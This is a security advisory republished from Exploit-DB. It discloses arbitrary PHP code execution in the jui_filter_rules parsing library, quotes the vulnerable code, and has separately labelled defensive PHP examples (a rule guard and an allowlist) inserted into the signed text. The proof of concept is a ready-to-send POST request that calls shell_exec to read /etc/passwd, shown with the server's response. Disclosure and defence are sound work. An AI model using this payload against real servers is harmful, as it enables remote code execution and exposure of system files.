jQuery – jui_filter_rules PHP Code Execution

  • Author: Timo Schmid
    Date: 2015-02-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36124/

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: RIPEMD160
    
    PHP Code Execution in jui_filter_rules Parsing Library
    ======================================================
    Researcher: Timo Schmid <tschmid@ernw.de>
    
    
    Description
    ===========
    jui_filter_rules[1] is a jQuery plugin which allows users to generate a
    ruleset that can be used to filter datasets inside a web application.
    
    The plugin also provides a PHP library that turns the user-submitted
    ruleset into SQL WHERE statements for server-side filtering. This PHP
    library contains a feature that converts the submitted filter values with
    server-side functions. These functions can be specified within the
    ruleset itself, which leads to arbitrary PHP code execution.
    
    
    Exploitation Technique
    ======================
    Remote
    
    
    Severity Level
    ==============
    Critical
    
    
    CVSS Base Score
    ===============
    6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P)
    
    
    CVE-ID
    ======
    <unassigned>
    
    
    Impact
    ======
    By using the provided rule parsing library to generate SQL statements, an
    attacker is capable of executing arbitrary PHP code in the context of the
    web server. This could lead to a full compromise of the web server. The
    attack vector could be limited by existing validation mechanisms around the
    library, but this would require a partial manual parsing of the user
    supplied rules.
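    The paragraph above notes that validation around the library would require
    partially parsing the submitted rules by hand. The following is an added
    example (not part of the advisory or of the jui_filter_rules project) of
    such a pre-parse guard for deployments that cannot upgrade yet: it walks
    the decoded a_rules array and rejects any rule carrying a server-side
    conversion directive, so the library never reaches call_user_func_array
    with client-chosen input. The key names follow the advisory's PoC request;
    the function names and the sample arrays are constructed for illustration.

```php
<?php
// Added example, not the project's code: reject any submitted rule tree that
// contains a 'filter_value_conversion_server_side' directive before it is
// handed to jui_filter_rules. Key names follow the advisory's PoC request.

declare(strict_types=1);

// Keys that must never appear in client-supplied rules (assumption: this
// deployment needs no server-side conversion at all).
const FORBIDDEN_RULE_KEYS = ['filter_value_conversion_server_side'];

/**
 * Returns the path of the first forbidden key found, or null if the rule
 * tree is clean. Nested arrays (rule groups) are searched recursively.
 */
function find_forbidden_key(array $node, string $path = 'a_rules'): ?string
{
    foreach ($node as $key => $value) {
        $here = $path . '[' . $key . ']';
        if (is_string($key) && in_array($key, FORBIDDEN_RULE_KEYS, true)) {
            return $here;
        }
        if (is_array($value)) {
            $hit = find_forbidden_key($value, $here);
            if ($hit !== null) {
                return $hit;
            }
        }
    }
    return null;
}

/** Guard to call on $_POST['a_rules'] before invoking the library. */
function assert_rules_are_safe(array $rules): void
{
    $hit = find_forbidden_key($rules);
    if ($hit !== null) {
        // Log and refuse the whole request; do not strip the key and continue.
        error_log('jui_filter_rules: rejected rule with ' . $hit);
        http_response_code(400);
        exit('invalid filter rules');
    }
}

// Constructed sample input shaped like the advisory's PoC, as it looks after
// PHP has decoded the urlencoded form body into a nested array.
$malicious = [
    0 => [
        'element_rule_id' => 'foo',
        'condition' => ['field' => 'some_field', 'operator' => 'equal',
                        'filterType' => 'date', 'filterValue' => ''],
        'filter_value_conversion_server_side' => [
            'function_name' => 'shell_exec',
            'args' => [['value' => 'cat /etc/passwd']],
        ],
    ],
];
// Constructed benign rule: same condition, no conversion directive.
$benign = [
    0 => [
        'element_rule_id' => 'foo',
        'condition' => ['field' => 'some_field', 'operator' => 'equal',
                        'filterType' => 'date', 'filterValue' => '2015-01-12'],
    ],
];

var_dump(find_forbidden_key($malicious)); // path of the offending key
var_dump(find_forbidden_key($benign));    // null: nothing to reject
```

    The guard refuses the request outright rather than deleting the key and
    continuing, so a tampered rule set is logged and never partially honoured.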
    
    
    Status
    ======
    Reported
    
    
    Vulnerable Code Section
    =======================
    server_side/php/jui_filter_rules.php:
    [...]
    private function create_filter_value_sql($filter_type, $operator_type, ...
    [...]
            if(is_array($filter_value_conversion_server_side)) {
                // function name and arguments are taken verbatim from the submitted rule
                $function_name = $filter_value_conversion_server_side['function_name'];
                $args = $filter_value_conversion_server_side['args'];
                $arg_len = count($args);
                for($i = 0; $i < $vlen; $i++) {
                    // create arguments values for this filter value
                    $conversion_args = array();
                    for($a = 0; $a < $arg_len; $a++) {
                        if(array_key_exists('filter_value', $args[$a])) {
                            array_push($conversion_args, $a_values[$i]);
                        }
                        if(array_key_exists('value', $args[$a])) {
                            array_push($conversion_args, $args[$a]['value']);
                        }
                    }
                    // execute user function and assign return value to filter value
                    // (no whitelist: any callable name reaches call_user_func_array)
                    try {
                        $a_values[$i] = call_user_func_array($function_name, $conversion_args);
                    } catch(Exception $e) {
                        $this->last_error = array(
                            'element_rule_id' => $element_rule_id,
                            'error_message' => $e->getMessage()
                        );
                        break;
                    }
                }
            }
    [...]
    
    The provided PHP parsing library allows a PHP function to be specified that
    converts the supplied filter value on the server side. This ultimately
    leads to code execution through attacker-supplied input. As no whitelist
    approach is used, any existing PHP function could be executed (including
    functions that run shell commands).
    
    
    Proof of Concept
    ================
    Using the demo application from the git repository:
    
    Executing shell_exec('cat /etc/passwd')
    
    Request:
    POST /ajax_create_sql.dist.php HTTP/1.0
    host: http://www.example.com
    X-Requested-With: XMLHttpRequest
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 471
    
    a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=shell_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpasswd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bcondition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=date
    
    Response:
    HTTP/1.1 200 OK
    Date: Tue, 13 Jan 2015 02:12:33 GMT
    Server: Apache/2.2.22 (Debian)
    Content-Length: 530
    Content-Type: text/html
    
    {"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin COSMOS:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"}
    
    
    
    Solution
    ========
    This functionality should generally be removed, or replaced by a
    mapping/whitelist approach combined with strict type filtering, to prevent
    arbitrary code execution.
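    As an added illustration of the mapping/whitelist approach recommended
    above (example code, not the project's own fix in 1.0.6), the conversion
    step below replaces the free-form function_name lookup with a fixed
    allowlist of conversions and strict argument typing. The rule shape
    (function_name, args, value, filter_value) follows the vulnerable code
    quoted in the advisory; the conversion names, their implementations and
    the simplification that the filter value is always passed first are
    assumptions made for this example.

```php
<?php
// Added example, not the project's code: an allowlisted replacement for the
// call_user_func_array step shown in the advisory. The client may only name
// a conversion from the fixed map below; it can never supply a callable.

declare(strict_types=1);

/**
 * Allowlist of conversions, keyed by the name the client may send. Each entry
 * fixes the callable and the number of extra constant arguments it accepts
 * after the filter value. (Assumed conversions, chosen for illustration.)
 */
function conversion_allowlist(): array
{
    return [
        'to_upper' => ['callable' => fn(string $v): string => strtoupper($v), 'extra_args' => 0],
        'trim'     => ['callable' => fn(string $v): string => trim($v),       'extra_args' => 0],
        // Date reformat: filter value plus one constant format string.
        'date_fmt' => [
            'callable' => function (string $v, string $fmt): string {
                $ts = strtotime($v);
                if ($ts === false) {
                    throw new InvalidArgumentException("bad date: $v");
                }
                return date($fmt, $ts);
            },
            'extra_args' => 1,
        ],
    ];
}

/**
 * Applies the requested conversion to each filter value. Throws on any name
 * outside the allowlist or on a malformed args structure, instead of calling
 * whatever the client named.
 */
function convert_filter_values(array $values, array $conversion): array
{
    $allow = conversion_allowlist();
    $name = $conversion['function_name'] ?? null;
    if (!is_string($name) || !isset($allow[$name])) {
        throw new InvalidArgumentException('unknown conversion: ' . var_export($name, true));
    }
    $spec = $allow[$name];
    $args = $conversion['args'] ?? [];
    if (!is_array($args)) {
        throw new InvalidArgumentException('args must be an array');
    }

    // Collect constant arguments; the filter value itself is passed first.
    $extra = [];
    $usesFilterValue = false;
    foreach ($args as $arg) {
        if (!is_array($arg)) {
            throw new InvalidArgumentException('malformed arg');
        }
        if (array_key_exists('filter_value', $arg)) {
            $usesFilterValue = true;
            continue;
        }
        if (array_key_exists('value', $arg) && is_scalar($arg['value'])) {
            $extra[] = (string) $arg['value'];
            continue;
        }
        throw new InvalidArgumentException('malformed arg');
    }
    if (!$usesFilterValue || count($extra) !== $spec['extra_args']) {
        throw new InvalidArgumentException("bad argument count for $name");
    }

    $out = [];
    foreach ($values as $v) {
        if (!is_scalar($v)) {
            throw new InvalidArgumentException('filter value must be scalar');
        }
        // The callable is ours, never the client's: only the data is untrusted.
        $out[] = ($spec['callable'])((string) $v, ...$extra);
    }
    return $out;
}

// Constructed sample: a legitimate conversion request.
$ok = convert_filter_values(['2015-01-12'], [
    'function_name' => 'date_fmt',
    'args' => [['filter_value' => true], ['value' => 'Y/m/d']],
]);
var_dump($ok);

// Constructed sample shaped like the advisory's PoC: rejected at the name check.
try {
    convert_filter_values([''], [
        'function_name' => 'shell_exec',
        'args' => [['value' => 'cat /etc/passwd']],
    ]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

    Because the callable is resolved from a server-side map rather than from
    the request, a rule can at most pick one of the named conversions and feed
    it typed string data; there is no path from the ruleset to an arbitrary
    PHP function.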
    
    
    Affected Versions
    =================
    >= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b
    < 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1)
    
    
    Timeline
    ========
    2015-01-12: Vulnerability found
    2015-01-13: Developer informed
    2015-02-14: Fixed in version 1.0.6 (git 0b61463cd02cc1814046b516242779b29ba7d1e1)
    
    
    References
    ==========
    [1] http://www.pontikis.net/labs/jui_filter_rules
    [2] https://www.owasp.org/index.php/Code_Injection
    [3] https://www.ernw.de/download/BC-1501.txt
    [4] https://bufferoverflow.eu/BC-1501.txt
    
    
    Advisory-ID
    ===========
    BC-1501
    
    
    Disclaimer
    ==========
    The information herein contained may change without notice. Use of this
    information constitutes acceptance for use in an AS IS condition. There are
    NO warranties, implied or otherwise, with regard to this information or its
    use. Any use of this information is at the user's risk. In no event shall
    the author/distributor be held liable for any damages whatsoever arising
    out of or in connection with the use or spread of this information.
    
    - -- 
    Timo Schmid
    
    ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg-www.ernw.de
    Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192
    PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
    
    Handelsregister Mannheim: HRB 337135
    Geschaeftsfuehrer: Enno Rey
    
    ==============================================================
    || Blog: www.insinuator.net | | Conference: www.troopers.de ||
    ==============================================================
    ================== TROOPERS15 ==================
    * International IT Security Conference & Workshops
    * 16th - 20th March 2015 / Heidelberg, Germany
    * www.troopers.de
    ====================================================
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v2
    
    iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP
    YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x
    x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr
    bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa
    Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs
    AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds=
    =tnwW
    -----END PGP SIGNATURE-----